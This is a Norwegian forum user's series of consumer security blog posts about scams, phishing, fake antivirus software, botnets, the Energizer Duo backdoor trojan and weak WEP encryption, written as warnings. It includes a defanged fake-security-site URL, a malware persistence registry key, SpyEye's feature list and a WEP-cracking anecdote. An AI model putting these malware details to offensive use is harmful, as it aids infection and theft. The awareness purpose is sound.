Gå til innhold

norbat

Medlemmer
  • Innlegg

    8 388
  • Ble med

  • Besøkte siden sist

Blogginnlegg skrevet av norbat

  1. norbat
    Nigeriasvindel har vært kjent fra 1970-tallet (da i form av vanlig brev, telex eller telefax). Siden har det spredt seg via internett.
     
    Det nye er tydeligvis personlig oppmøte. Nylig ble fire personer lurt til å utbetale 535.000 kroner.
     
    Når noe virker for godt til å være sant, er det mest sannsynlig det.
     
    Les hele saken i Agderposten
  2. norbat
    Hele tiden forsøker hackere i mer eller mindre organiserte former å hente ut informasjon fra fremmede datamaskiner og bruke dem til kriminalitet.
     
    - Økningen de siste årene har vært formidabel. Hver time oppdages 1.800 nye trusler mot datamaskiner og nettverk via internett. For tre år siden var dette tallet så vidt over 100, sier en sikkerhetsekspert i Telenor Security Operation Centre (TSOC).



    Største trusler i 2010 vil fortsatt være:
    Drive-by: Falske og ofte skjulte henvisninger på nettsider som sender deg til utenlandske sider hvor du indirekte autoriserer tilgang til din maskin.
     
    Falske bannerreklamer: Hackere klarer å plassere falske reklamebannere på nettsider. Klikker du deg inn på disse, ender du på utenlandske nettsider hvor det etableres en bakdør til din maskin.
     
    Falske antivirusprogrammer: Billige eller gratis tilbud om installering av antivirusprogrammer som du laster ned til din datamaskin. Programvaren tar kontroll over maskinen og forlanger penger for å slutte å plage deg.
     
    Koobface: Falske oppdateringer i sosiale nettverk som Twitter, MySpace eller Facebook. Det sendes for eksempel ut invitasjoner til å se videoer som sender deg til en ondsinnet nettside.
  3. norbat
    For noen år siden ville alle varsellamper ha lyst når en slik epost kom. I dag, med et utbredt forbrukmønster knyttet til div. nettbutikker, er det ikke nødvendigvis slik at en slik melding straks får varsellampen til å lyse.
     

     
    For mitt vedkommende venter jeg faktisk på en pakke fra utlandet. Om den blir levert med UPS vet jeg ikke, - kanskje.
     
    Uansett, en rask sjekk av vedlegget som utga seg for å være et dokument, viste ved utvidet filendelseinfo, at dette var en .exe-fil.
     

     
    En sjekk på virscan.org ga også treff hos noen av-prog.
     
    Selv om det er større fare å bli infisert ved å besøke nettsider som inneholder skadelig kode, så er det fortsatt de som prøver å lure brukeren til å åpne epostvedlegg med skadelig innhold. Det er altså ingen grunn til å senke varsellampemoduset - tvert om. Kanskje er vedlegg med skadelig innhold en økende trend?
  4. norbat
    Siden 2007 har Energizer vært uvitende distributør av en Trojan som en del av deres Energizer Duo programvare. Filen Arucer.dll, som ble antatt å være en legitim fil som brukes av USB-batteriladere, ble i stedet en trojaner med bakdørfunksjon som tillater ekstern tilgang til datamaskin.
     
    Det har alltid vært tenkt at Arucer.dll var et legitim fil som kunne sjekke status på batteriene i batteriladeren når denne var koblet til datamaskinen. Cert har oppdaget at denne filen istedet kan være en bakdør-trojaner som lytter på port 7777 for kommandoer fra en ekstern plassering.
     
    Et eksempel ble også gitt til Symantec der de utført en analyse. De bekreftet at Arucer.dll virkelig var en bakdør og og at den var i stand til å utføre kommandoer utstedt eksternt. Disse kommandoene kan utføre følgende handlinger:


     
    Last ned filer
    Kjør filer
    Send en katalogoppføring til ekstern angriper
    Send filer til ekstern angriper
    Modifisere følgende registeroppføring: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”svchost”

     
    Energizer har nå fjernet programvaren og sendt ut en pressemelding om at en "sårbarhet" er funnet.
     
    For deg som benytter denne programvaren:
    Hvis du vil fjerne denne bakdøren, avinstaller Energizer Duo programvaren og start datamaskinen på nytt. Du vil da kunne fjerne C:\Windows\system32\arucer.dll filen fra datamaskinen. Antivirusprogrammer vil også få oppdatert sine definisjoner slik at av-programmet ditt vil detektere og fjerne fila.



    Mer info: Symantec
  5. norbat
    De tradisjonelle kataloghaiene er på retur, men næringslivet er utsatt for nye former for bedrageri.Varslingslisten (varslingslisten.no) fra Næringslivets Sikkerhetsråd hjelper bedriftene å avsløre svindelforsøk.


     
    Fra 1. mars er varslingslisten lagt om slik at den legger mer vekt på metodene enn på aktørene i svindelmarkedet.
     
    En av de nyere metodene som beskrives på Varslingslisten er at bedriften får en oppringning av en selger, ofte fra Sverige.
     
    – De er gjerne aggressive på telefonen, ringer forskjellige personer i firmaet til de finner en som hører på dem. De forteller at firmaet må si opp et abonnement på en tjeneste straks, ellers løper den videre. De påstår gjerne at sjefen har bedt vedkommende medarbeider ordne opp i dette. Deretter sender de en faks som skal returneres. Men det er ikke en oppsigelse, men derimot en bestilling som binder firmaet i mange perioder.
     
    Den mest utbredte metoden er fakturasvindel i forskjellige former. Firmaet kan få en falsk faktura på ting som verken er bestilt eller levert eller det kan være tilbud skrevet på fakturablankett som ved en feil blir betalt.
     
    Vær på vakt!
     
    NHO.no
    Varslingslisten.no
  6. norbat
    Flere av mine kompiser har kjøpt seg Mac, og det er utvilsomt en lekker sak. Problemet er imidlertid at det argumentet som de alle bruker på hvorfor de heller vil bruke mye penger på en mac framfor å få en pc som brenner asfalt for samme pris, er at de er lei av krasj og malware.
     
    Om Mac kræsjer mindre/aldri, det vet jeg lite om, men om de tror at Mac er malwarefritt, vil de få seg en overraskelse. Pr dags dato finnes det kanskje ikke virus? for mac-systemet, men en rekke trojanere som skaper bakdører øker i takt med at Mac OS øker i utbredelse.
     
    Jeg trakk litt på smilebåndet da jeg leste følgende på en mac-forum:
    "Forskjellen (virus vs. trojanere etc) er at du ikke kan få denne (trojaner) installert på din maskin uten at du selv foretar deg noe. Det er derfor enkelt å beskytte seg mot trojanske hester."
     
    Ja, som Windowsbruker har man sagt det samme i 15 år. 95% av de infiserte pc'n er et resultat av at man aktivt har lastet ned og aktivert trojaneren. De siste prosentene er knyttet til de som slurver med å holde programvaren sin oppdatert og dermed er utsatt for exploits (i all hovedsak knyttet til 3.partsprog. av typen Adobe etc og ikke Windows). Det skal da egentlig være enkelt å beskytte seg mot trojanske hester.
     
    Men, hvorfor finnes det da langt flere pc-brukere som er infisert enn mac-brukere. Er pc-brukeren dummere, mer naiv og godhjertet som så lett lar seg lure? Svaret er antakelig litt sammensatt, men det kan ha betydning at 89% bruker Windows mens bare 5.9% benytter Mac OS. I tråd med at sistnevnte OS øker i popularitet, vil nok bildet endre seg.


     
    F-Secure har nylig utgitt et sikkerhetprogram beregnet for Mac OS

     
    Det skader ikke å tenke sikkerhet, verken for Windows- eller Mac-brukere. Velkommen etter, Mac-bruker.
  7. norbat
    Selv om Microsoft Security Essentials er på vei til å erstatte Windows Defender, så er programmet fortsatt et alternativ som beskyttelse mot spyware og annet rammel.
     
    Dette blir selvfølgelig utnyttet av de som ønsker å tjene penger på å selge falske sikkerhetsprogrammet. Derfor er det nylig lansert en falsk utgave som går under navnet Windows Defender 2010 (NB!Falsk nettside: hxxp://pcwin-live.com/ )
     

  8. norbat
    Spansk politi har anholdt tre menn som de mener står bak et stort botnett. Ifølge spansk politi anses mennene å stå bak hackerringen Mariposa, som har infisert pc-er i 130 land.


     
    Mariposa botnettet ble tatt offline i desember etter en aksjon som involverte bla. FBI og Guardia Civil i Spania. Botnettet ble brukt til å stjele sensitiv informasjon fra uvitende brukere, inkludert brukernavn, passord, innloggingsdetaljer for nettbank og kredittkortdata.
     
    Den spanske gjengen leide ut deler av botnet til andre cyber-kriminelle i bytte mot kontanter, og solgte stjålne bank-og kredittkort informasjon til tredjepart.
     
    En Seniorforsker i Panda Security, sier: «Vår foreløpige analyser indikerer at botmasters ikke har spesiell avansert hacking- ferdigheter. Dette er svært alarmerende fordi det viser hvor effektiv distribusjon av skadelig programvare har blitt, og at relativt ufaglærte cyber-kriminelle påfører store skader og økonomiske tap.
     
    Har selv sett at på enkelte undergrunnsforum kan man få 'leie' eller hjelp til å sette opp et botnet for 4 tusen dollar og oppover. Noen større hackerferdigheter er det altså ikke snakk om.
     
    Kilde:
    www.net-security.org
    Symantec
  9. norbat
    I 2009 hadde DNB-NOR alene 439 saker, en økning på 96% fra året før. 1395 mobilabonnement bestilt med falsk ID i 2009 hos Telenor.
     
    For å kunne opptre som deg trenger ID-tyven mest mulig informasjon. Dette er noen av metodene ID-tyven bruker:


     
    Stjele kredittkort eller bankkort
    Stjele fra postkasse eller søppel
    Tappe mobiltelefon eller PC
    Phishing (lure fra deg persondata)
    Hacking
    Virus
    Søk på internett
    Bestillingstyveri
    Stjele PIN-koder og passord
    Sosial manipulering
    Endre adresse

    Nettsiden www.idtyveri.info har samlet mye interessant stoff som kan være verdt en titt. De har også en selvtest, der du kan sjekke hvor god du er på å ta vare på din 'id-sikkerhet'.

     
    Surf trygt!
  10. norbat
    Phishing er en betegnelse på digital snoking eller fisking etter sensitiv informasjon, som passord eller kredittkortnummer.
     
    Svindlerne kan lure deg til å gi i fra deg informasjon på flere måter. For eksempel kan de oppfordre deg til å svare på en e-post med falsk svaradresse slik at de selv mottar informasjonen fra deg.
     
    En annen metode er å oppgi en lenke i e-posten som leder til en falsk nettside der du blir bedt om å gi opplysninger. Nettsiden kan se ekte ut. Under er en knipe med slike falske sider som enten lurer fra deg brukernavn og passord og/eller kreditkortopplysninger.
     
    Facebook:

     
    WoW:

     
    Yahoo:

     
    Rapidshare:

     
    XBOX:

     
    Råd for å unngå phishing:(fra nettvett.no)
    Ikke bruk lenker til nettsider fra en e-post du har mistanke om er fra en mistenkelig eller ukjent avsender.
     
    Skal du gi fra deg personlig informasjon på en nettside, må du forsikre deg om at du er på en såkalt sikker oppkobling. En enkel måte å sjekke dette på er å se om det finnes et symbol med en liten hengelås ved adressefeltet i nettleseren. Står det HTTPS først i adressen, betyr det at nettsiden har en sikker tilkobling. Dette gir ikke noen garanti, men gjør det sikrere å gi fra seg personlig informasjon. Er du usikker kontakter du organisasjonen du skal gi informasjon til via telefon..
     
    Husk at banker aldri ber om sensitiv informasjon via e-post.
    Er du usikker på om du har gitt fra deg opplysninger som kan misbrukes, sjekk kontoutskriften nøye.
     
    Bruk antivirusprogram og brannmur. Sørg for at disse programmene, samt operativsystemet og nettleseren alltid er oppdatert.
     
    Phishingsider blir forholdsvis raskt snappet opp og meldt inn som falske sider. Nettleseren din vil derfor i mange tilfeller melde ifra om at du er på vei til å besøke en side som er meldt inn som svindel
     
    Eks. Opera:

     
    Surf trygt!
  11. norbat
    I et tidligere innlegg, nevnte jeg at det i forbindelse med 'større' hendelser, eks. OL i Vancouver, får man gjerne en oppblomstring av søketreff som leder til malware.
     
    Symantec har et eksempel knyttet til jordskjelvet som skjedde i Chile 27.feb. Et googlesøk kort tid etter hendelsen, ga treff som ledet til nedlasting av falske antivirusprogarm.
     
    Men, som Symantec sier: "Selv om vi ikke kan beskytte deg mot jordskjelv eller tsunamier, kan vi i alle fall hjelpe deg å unngå en ny bølge av skade på din datamaskin og din lommebok etter katastrofer av denne typen."
  12. norbat
    Så lenge man gjør det mot sin egen ruter så trenger man ikke å få dårlig samvittighet, men må man så må man...
     
    Av en eller annen grunn trynet husets trådløse ruter (Linksys) og jeg fikk ikke noe liv i den igjen. Med 4 pc'er i hus som alle går på trådløst, ble det krisestemning blant ungdommen. Hvordan skal vi klare oss uten msn, facebook, go supermodel og diskusjon.no - helt til i morgen?
     
    En rask sjekk viste at det var et WEP-kryptert nettverk ganske nære - ja det viste seg at det var naboen som hadde ett. Vedkommende var dessverre reist bort for helga, men som gode naboer vi er og etter en rask telefon, så var det ikke noe problem å få bruke nettet hvis jeg klarte å koble meg inn på ruteren. Hvilken WEP-nøkkel som trengtes hadde naboen ingen peiling på ("WEP, hva er det?") da det ikke var han som hadde satt opp utstyret. "Det løser jeg, ha en fortsatt fin kveld."
     
    Som kjent (det burde være det) er WEP-kryptering en særdeles dårlig sikkerhet og med riktig program tok det meg 15 minutter å framskaffe wep-nøkkelen. Nå vil nok en wep-kryptert ruter stenge ut den vanlige naboen, men hvis dette er den vanlige måten å sikre sitt nettverk på, så er det betenkelig.
     
    Jeg tok med meg pc'n i bilen og kjørte litt rundt i nabolaget og min mistanke om dårlig sikkerhet ble bekreftet. Av 60 nettverk var det 10 uten noen form for kryptering (sjekket ikke om det var satt på mac-filtrering). 33 hadde wpa/wpa2 mens resten, 17, hadde WEP.
     
    Flere av de som hadde WEP-kryptering, hadde ruter fra Telenor (SSID = privat......). WEP-kryptering var en standard som Telenor satt opp ruterne sine med fordi ikke alt nettverksutstyr støttet/støtter WPA/WPA2. Mener at de nå benytter WPA/WPA2 som standardkryptering.
     
    Om du bor i et område med mye folk, så ville nok jeg ha satt WPA/WPA2-kryptering på nettverk.
  13. norbat
    Når vi er så godt i gang med å advare mot kopier av kjente merkevarer (Avira, MSE etc.), så kan vi like godt slenge på en som prøver å utnytte Microsoft Live sitt gode navn og rykte.
     
    Live Enterprise Suite. For bare 89.95 dollar vil du få et program som beskytter deg mot det meste. Synd at det ikke finnes et program som kan beskytter brukeren mot seg selv, men vi får stole på at antivirusprogrammet vi har på pc'n sier ifra når vi gjør noe dumt
     

  14. norbat
    Det florerer av dem og i forrige blogginnlegg ble botnettet Spy-Eye nevnt. Dette brukes bla. til å spre slike program. Frustrasjon for brukeren, gode penger til botnett-eieren.
     
    Hardware nevnte nylig et program som 'etterligner' Microsoft Security Essentials". Det kalles noe navnelikt - Security Essentials 2010 (se bilde)
     
    Navnelikhet er noe som ofte brukes for å forvirre en bruker. Avira, som tilbyr et av de beste gratisantivirusprogrammene opplever også slik etterligning.
     
    Under ser du ei nettside som tilsynelatende framstiller Avira sin nettside - eller kanskje det er den orginale?
     

     
    Nettsiden over er nok falsk, selv om de har med elementer som er lik Avira. Under er headingen fra Avira sin ordentlige side.
     

  15. norbat
    Det er ikke bare i det vanlige næringslivet det konkurreres, men også blant programmerere på den mørke siden (black hat). Det finnes flere store botnet i omløp. Det mest kjente er antakelig Zeus, som både i utstrekning og økonomisk kanskje er det største.
     
    På et undergrunnsforum kom jeg over følgende innlegg:
     

     
    Prisen på denne boten (base bundle) på nåværende tidspunkt er 500 USD. Boten inneholder:

    Formgrabbing: en avansert keyloggingsmetode for å fange webskjema data støtter Firefox, IE, Maxthon og Netscape.
    CC Autofyll: en modul som egentlig automatiserer prosessen med kredittkort svindel, og gir penger til eieren.
    PHP-MYSQL Admin Panel
    Daglig backup av databasen via e-post
    Exe String-Kilde kryptering
    FTPgrabbing (Total Commander, Notepad + +, FileZilla, og andre)
    POP3grabbing
    Usynlig i prosesserlisten, skjult fil, usynlig i autorun (register)
    Zeus-killer

     
    Det spesielle med spy-eye er at den sjekker om pc'n den infiserer allerede er infisert med Zeus. Hvis, så vil spy-eye ha mulighet til å slette den malwaren.
     
    Programmereren sier i en annen sammenheng at dette vil bli mer og mer vanlig - at malware vil slette annen malware som pc'er er infisert med slik at man kan råde grunnen alene. På spørmsål om Zeus-programmererne er sure på vedkommende bak Spy-eye, svarer vedkommende at det er de ikke fordi de tjener så mye penger - enn så lenge.
  16. norbat
    I dag så jeg et dansk program som het ”Det usikre internet” (NRK 2, sendt på DR i 2009 (velg 6/5)). Der ble det vist hvor lett det bla. er å dekryptere WEP, som fortsatt mange i dag benytter på sin trådløse forbindelse. Mange krypterer ikke i det hele tatt.
     
    Det er stadig vanligere at man har flere pc’er i hus, gjerne med en sentral mediaserver. Har du tilgang til nettverket, vil du også få tilgang til de delte ressursene. Enda en grunn til at man ikke bør være slapp med sikkerheten på sitt eget nettverk.
     
    I programmet ble det også tatt opp dette med ID-tyveri og hvor lett det er å skaffe seg tilgang til andres kreditkortinformasjoner. Det er et stort marked for kjøp og salg av slik informasjon.
     
    Har du lås på postkassa di? Ikke jeg heller, men kanskje det bør vurderes. Jeg fikk nylig et nytt kodekort til nettbanken min rett i postkassa. Med det i hende, så mangler man bare den personlige koden (ser bort ifra personnummeret da dette lar seg finne). Er man like lite flink til å lage seg et sterkt passord, så finnes det mange oversikter over vanlige passord som man kan tenke seg til ved å vite hvem man prøver å hacke. Til dette svarte nettbanken: "Vi vurderer ikke dette som en sikkerhetsrisiko. Man kan ikke benytte et kodekort alene til å logge inn i nettbanken. Innlogging krever i tillegg skal man kjenne fødselsnummer 11 siffer, og nettbankpassord. Et engangspassord er også kun gyldig i sesjonen det spørres etter.". Ja vel, sier nå jeg.
     
    Mye av vår ’identitet’ ligger i vår aktivitetet på nettet. Facebook, msn, gmail… - den eneste beskyttelsen vi har er å lage et godt passord - og hva vi faktisk legger ut av informasjon om oss selv.
     
    IT-eksperten som ble brukt i programmet var for øvrig Dan Egerstad, som ble kjent i 2007 for å ha brukt TOR nettverket til å finne brukernavn og passord til epostkontoer til div ambassader og regjeringer rundt i hele verden. Pga. dårlig respons fra de berørte, offentliggjorde han 100 kontoer med brukernavn og passord.
     
    Det finnes noen nettvettregler knyttet til passord. Du kan jo sjekke opp mot ditt passord.
     


     
    Et passord er personlig og må ikke overlates til andre.
    Det bør bestå av minst åtte tegn.
    Det bør helst bestå av en kombinasjon av små og store bokstaver, tall og spesialtegn.
    Det bør ikke være det samme som eller deler av brukernavnet.
    Det bør ikke være knyttet til personlig informasjon.
    Det bør ikke være tegnkombinasjon eller ord som finnes i ordbøker.
    Det bør ikke være et ord som er skrevet baklengs.
    Det bør byttes hver tredje måned og ikke være likt tidligere passord.
    Det bør ikke skrives ned.
    Det bør ikke inneholde æ, ø eller å.

     
    Mange har kankje også det samme passordet på de ulike nettjenestene man benytter?
  17. norbat
    Med vinter-OL i nyhetsbildet de siste par ukene, har malware profitører som vanlig arbeidet hardt for å få mest mulig oppmerksomhet.
     
    Deres strategi er enkel: opprett ondsinnede websider med søkeord som sannsynligvis vil komme opp i nyhetsrelaterte søk knyttet til OL. Jo raskere en slik side kan settes opp, jo bedre sjanse har den til å få en høy søkemotor-rangering. Selv om det normalt ikke er så mange linker til slike sider fra andre kilder, er det svært sannsynlig at om malwareprofitørene publisert tidlig vil dette kunne løfte websiden i de øverste søkeresultatene.
     
    Hva skjer om man klikker på en slik søkelenke? Lenken kan føre til en falsk onlineskanner som forteller at pc'n din er infisert og at du trenger å laste ned et program for å fjerne truslene. Ved å laste ned programmet, vil man være nødt til å betale for å fjerne malwaren - noe det selvfølgelig ikke gjør da alt bare er lureri. I tillegg kan slik programvare åpne for annet malware og skape pcproblemer.
     
    En side jeg kom over ledet til nedlasting av en ny variant av SecurityTool - et falskt antivirusprogram: Linken førte til en nettside som først ga denne meldingen
     
    Uansett hva man velger å trykke på i bildet over, åpnes en falsk onlineskann:
     
    Om du klikker avbryt eller kryss så kommer allikevel følgende melding opp:
     
    Igjen, uansett hva du klikker, vil selve nedlastingsvinduet til programvaren sprette fra:
     
    Så, hva gjør man for å bli kvitt dette?
    Enkelt. Du lukker nettleseren/arkfanen. Så lenge du ikke velger å installere programmet vil ikke dette utgjøre noen fare.
     
    Både IE, Chrome og sikkert andre nettlesere er rimelig raske med å eksludere slike websider, dvs. de gir deg en advarsel om at du er på vei til å besøke en usikker webside.Eks. IE:
     
    Surf trygt!
  18. norbat
    Comodo, som lager sikkerhetsprogrammer og som bla. har en brannmur i verdensklassen, har gitt ut en nettleser bygd på Chromium. Nettleseren ser lik ut som Google Chrome, men Comodo har hatt større fokus på personvern og sikkerhet. I dette ligger det at man har fjernet funksjoner som Comodo anser som en sikkerhetsrisiko i Chrome og lagt til funksjoner som skal gi bedre sikkerhet for brukeren.
    Comodo Dragon er selvsagt gratis og kan lastes ned fra Comodo.com
  19. norbat
    FIRE er et system som automatisk identifisere og avdekke organisasjoner og Internett-leverandører som viser vedvarende, skadelig atferd. Dette kan være servere som enten er hacket eller som bevist bedriver med spam, phishing og exploits (skadelig kode og nedlasting av malware).Denne informasjonen kan benyttes av ISP'er til å blokkere disse ip'ene slik at disse serverne blir isolert.Som illustrasjonen viser, så er det rimelig mange servere som er avdekket. I Europa er det vanligste exploits-servere (skadelig kode). Afrika og Asia har i stor grad Spam- og phishing.
  20. norbat
    I datasikkerhetssammenheng er "social engineering" et begrep som knytter seg til det å lure til seg informasjon som andre egentlig ikke ønsker å formidle eller å få noen til å utføre handlinger mot bedre viten. Denne formen for 'hacking' er i mange sammenhenger langt vanligere enn å bryte seg inn i eller bruke andre hacker teknikker for å få tilgang til data.
     
    At blogger og nettsamfunn har 'tatt av', har også malware-forfatterene registrert. Et typisk angrepsscenario innebærer at angriperne identifisere en høy trafikkert blogg eller forum med kommentarfunksjon tilgjengelig, evt. tillater anonym kommentering. Her kan angriperen skrive noe 'tillitsvekkende' og som gjør at man klikker på linken som vedkommende har vedlagt. Linken fører selvsagt til nedlasting av malware eller til nettsider der man blir bedt om å taste inn brukernavn og passord til div. tjenester man benytter eller annen personlig informasjon.
     
    MSN-phishing er et godt eksempel på hvordan man 'frivillig' gir fra seg personlig informasjon i form av brukernavn og passord. Facebook har også slitt med slike forsøk på å tilegne seg brukernavn og passord.
     
    Hele 92 prosent av alle sexrelaterte phishing-forsøk finner nå sted i sosiale medier. Det viser sikkerhetsselskapet Symantecs globale spam- og phishing-rapport for januar. En ny trend i ”adult” eller sexbasert phishing er å love brukeren gratis pornografi mot å oppgi personlig informasjon. Når brukerne har lagt inn sine personlige data, sendes de videre til en pornografisk nettside som også inneholder ondsinnet kode.
  21. norbat
    Med mange produkter på markedet samt lovnader om at ”vi er best…”, så er det ikke lett å velge det ’beste’ anti-programmet og som i tillegg kan holde det det lover. Det mest aktuelle spørsmålet er kanskje om det overhode finnes anti-program som kan holde pc’n fri for malware.
     
    Min påstand er nei. Fra egenerfaring og tester er det helt klart mangler ved alle de anti-programmene som finnes på markedet i dag. Forklaringen er ganske enkel – man kan ikke finne/stoppe skadelige programmer/kode som anti-programmet ikke kjenner. Dette er en delvis sannhet fordi anti-programmer til en viss grad kan kjenne igjen adferden til skadelige programmer/kode og på den måten stoppe/gi melding om at det finnes suspekte prosesser som ønsker å kjøre/kontakte nettet.
     
    At antivirusprodusenter lever gode og travle dager er det ingen tvil om da de hver dag mottar 50 000 eksempler på malware. Vi som er målet for denne malwaren blir stadig påminnet om viktigheten av å ha en god antivirusløsning enten via div. medieoppslag eller når man kjøper seg ny pc.
     
    Hvilket sikkerhetsprogram som velges varierer. Mange bruker det programmet som man får gratis via sin ISP (internettleverandøren). Telenor, CanalDigital og Get har henholdsvis Norton, F-Secure og Norman. Nettbanken du evt. bruker, kan også tilby gratis antivirus. Mange benytter også ett av de fullgode gratisalternativene som finnes, Avira, Avg el. Avast. Om man selv går til innkjøp av et sikkerhetsprogram, er ikke prisen det som bør være avgjørende. For 300 – 700 kr pr. år får man 1-3 lisenser for en sikkerhetsløsning som inneholder div. sikkerhetsprogrammer (antivirus, antispam, brannmur etc.)
     
    Så, hva bør man velge?
     
    Min påstand var at ingen anti-programmer kan beskytte deg mot all malware og derfor spiller det antakelig liten rolle hvilket anti-program du velger å benytte. Har du gratisløsninger tilgjengelige via din ISP eller nettbank, så går du for disse. Alternativt så benytter du ett av gratisprogrammene som er nevnt (Avira…). Det finnes også gratis brannmur og andre sikkerhetsprogram (eks. antimalware, antispam…) tilgjengelig og som sammen gir en, etter manges meninger, bedre sikkerhet enn disse alt-i-ett-programmene.
     
    Hvis man vil basere valget på tester, så finnes det noen av disse på nett og som vi bruker å henvise til i ny og ne.
     
    AV-Comparatives gir med jevne mellomrom ut tester av flere antivirus-programmer, både vanlig on-demand og proactive testing.
     
    Resultatene fra de siste testene sees under og skal man velge ut fra treffprosent, så ser man noen programmer som utmerker seg framfor andre.
     
    On-demand:

     
    Proactive:

     
    Det bør nevnes at bla. Avira og McAfee har mange falske positiver (gir melding om infeksjon på ikke-infiserte filer), mens BitDefender, F-Secure og Avg har få falske positiver.
     
    NSS-labs har også nylig testet en del anti-programmer opp mot hvor gode de er til å stoppe malware fra å bli lastet ned ved besøk på infiserte nettsteder samt hvor gode det samme programmet er til å stoppe prosesser når det først har blitt sluppet gjennom. Resultatet viser at Trend Micro er 'best'. Norton kompenserer den 'dårlige' preventive treffprosenten med at den tar godt for seg når malwaren forsøker å kjøre prosesser på pc'n.
     

     
    Konklusjon:
    Hvilket program som er 'best i test' vil endre seg fra test til test. Det som er sikkert er at ingen anti-program klarer å stoppe eller fjerne all malware. Derfor blir anbefalingen den samme regla som før: Hold programmene dine oppdatert (antivirus, windows, java etc...) og bruk hode ved å ikke klikke Yes og Ok på alt som måtte dukke opp av ting og tang på nett. Skulle det gå galt, så har du dette forumet til å hjelpe deg
  22. norbat
    Ja, slik var overskriften på en artikkel som sto på VG Nett nylig. For en som bruker litt tid på det samme feltet, så kan jo dette være interessant lesning - tenkte jeg.
     
    Artikkelen var skrevet i forbindelse med "Den nasjonale sikkerhetsdagen". Og hos Norsk Senter for Informasjonssikring (NorSIS) har man tre enkle steg som vil bidra til økt sikkerhet på datamaskinen din. Alle kan gjennomføres rask, enkelt og gratis. Etter å ha tatt stegene vil maskinen din være oppdatert, virusfri og bedre enn da du startet - påstås det
     
    Stegene som nevnes er ikke dårlige, men det spørs om det er så enkelt som det sies.
     
    Steg 1: Kjør Antivirus.
    En normal infeksjon i dag, har for vane å enten slå av antivirusprogrammet og/eller hindre antivirusprogrammet fra å oppdatere seg. En del rootkit hindrer også sikkerhetsprogram i og la seg starte overhode. Så, hvis du HAR en infisert pc, ryker oppryddingen allerede her.
     
    Får du oppdatert og kjørt antivirusprogrammet ditt, så er sannsynligheten stor for at du IKKE er infisert. Om du allikevel opplever popups og annen irriterende mas fra ulike suspekte sikkerhetsprogram, så bør ikke et antivirusprogram være 1.valget da andre anti-programmer er langt råere på å fjerne slikt, f.eks. Malwarebytes Anti-Malware el. Superantispyware.
     
    Steg 2: Slå på autooppdatering
    Ja, normalt så ER denne funksjonen påslått - noe den også bør være. Er den 'plutselig' avslått (man får gjerne en melding om det fra sikkerhetssenteret), så kan det tyde på at noe har sneket seg inn. Uansett, å holde operativsystemet sitt oppdatert er en naturlov.
     
    Steg 3: Oppdater resten
    Ja. flashplayer, java m.m må holdes oppdatert da det 'jevnlig' oppdages sikkerhetshull i programvare. Både Secunia og F-Secure har testprogram som kan sjekke om det er noe programvare som er utdatert og som trenger en oppdatering.
     
    Om disse 3 stegene gjør at du vil være virusfri - tviler jeg på. Eller, jeg vet at de ikke holder. Men det er en annen sak.
     
    Surf trygt.
  23. norbat
    Hvorfor backup?
    Det opplagte er at når harddisken ryker, så har du i allefall tatt vare på dokumenter, bilder etc. som du anser som verdifull. Problemet er kanskje at de fleste ikke tenker på dette - overhode. Eller, man tenker på det i ny og ne men får aldri gjort noe med det - før man sitter der og irriterer seg fordi harddisken krasjet.
     
    Nå finnes det andre gode grunner til å ta backup også - virus.
     
    Virus eller malware har i bunn og grunn ikke vært særlig skadelig med tanke på tap av data, om vi ser bort i fra enkelttilfeller. Malware i dag har vridd seg bort fra pubertale 'ødelegge-data' fakter og over mot en mer økonomisk affære. Conficker, som de fleste antakelig kjenner til, har bygd opp et gedigent botnett som kan/vil brukes til å spamme de infiserte pc'ene med falske antivirusprog., sende ut spam, DoS-angrep og annet som bakmennene måtte finne på å bruke dette botnettet til.
     
    Det finnes en svær bunke med såkalt uønsket programvare - program som tilbyr seg å fjerne sårbareheter etc. på pc'n mot betaling. Problemet er at programmet verken fjerner noen sårbarheter eller finner noen ordentlige sårbareheter. Det er kun snakk om å lure til seg penger.
     
    Om man blir infisert av slik malware, så er ikke dette katastofalt med tanke på tap av viktig data. Ja, pc'n kan oppleves sirup og ubrukelig, men stort sett lar slike infeksjoner seg lett løse.
     
    Verre er det med en infeksjon som nå tilsynelatende har begynt å bli mer aktiv - Virut
     
    Virut-familien er en gruppe filinfiserende virus med IRCBot funksjonalitet som infiserer exe, scr, script-filer (.PHP, .ASP og .HTML), xml, zip og rar, laster ned mer ondsinnet filer til systemet og åpner en bakdør på datamaskinen. De flest anti-programmer har evnen til å rense de infiserte filene. Problemet er at selv om filene kan bli renset for viruskode, så vil det i mange tilfeller være slik at desinfiseringen ikke klarer å bli gjort skikkelig
    fordi viruskoden skaper ikke-fungerende filer etter reparasjonen.
     
    Med andre ord, viktige filer blir skadet og systemet kan bli uopprettelig. Antakelig er en virut-infeksjon den infeksjonen som for øyeblikket skader systemet mest. Om man er så heldig at ingen systemfiler blir korrupte etter rensing, så er sannsynligheten stor for at en eller flere applikasjoner er skadet, med det resultatet at man får en lang rekke med errormeldinger.
     
    Så, hva gjør man om man har fått en Virut-infeksjon?
    Mitt råd er: Formater og reinstaller.
     
    Dette rådet gis ut fra at denne infeksjonen 'uansett' gir korrupte filer. Hvorfor kaste bort noen timer på å rense, når man allikevel får filer som ikke fungerer, feilmeldinger, ustabil windows, usikkerhet om man faktisk har fått fjernet all viruskode...?
     
    Det raskeste og sikreste er å formatere og reinstallere.
     
    En harddisk krasj eller en malwareinfeksjon skjer ofte plutselig.
    Derfor bør du bruke litt tid på å ta backup av data du ikke ønsker å miste - nå!
  24. norbat
    Den rimelig kjente ormen Conficker var programmert til å endre seg 1.april. Noen av endringene var kjent (bla. generering av 50 000 domenenavn). Hva den nye varianten egentlig vil gjøre er imidlertid ikke helt kjent men det som er helt opplagt er at det er et botnett som er bygd opp med anslagsvis 10 mill pc'er.
     
    Selv om vi skal ta denne type trusler alvorlige, så er det vel slik at denne type ting heller ikke er fredet for spøk - spesielt 1.april
     
    Samtidig så var det en liten motreaksjon mot alle nettavisene som spådde dommedag med blikkfang som 'Nå smeller det" og "Sikkerhetseksperter skjelver..." m.fl. Det som ikke ble nevnt er at målet for denne versjonen (Conficker C) var de pc'ene som allerede er infisert med Conficker og de pc'ene som fortsatt ikke har oppdatert sin Windows siden oktober 2008 (at piratversjoner av Windows i mange tilfeller ikke får oppdatert er ingen hemmelighet.)
     
    Aprilspøken inkl. 'beskyttelsesprogrammet' finne her: http://www.diskusjon.no/index.php?showtopic=1093473. Kan også leses under.
     
    Conficker har peilet seg inn på diskusjon.no
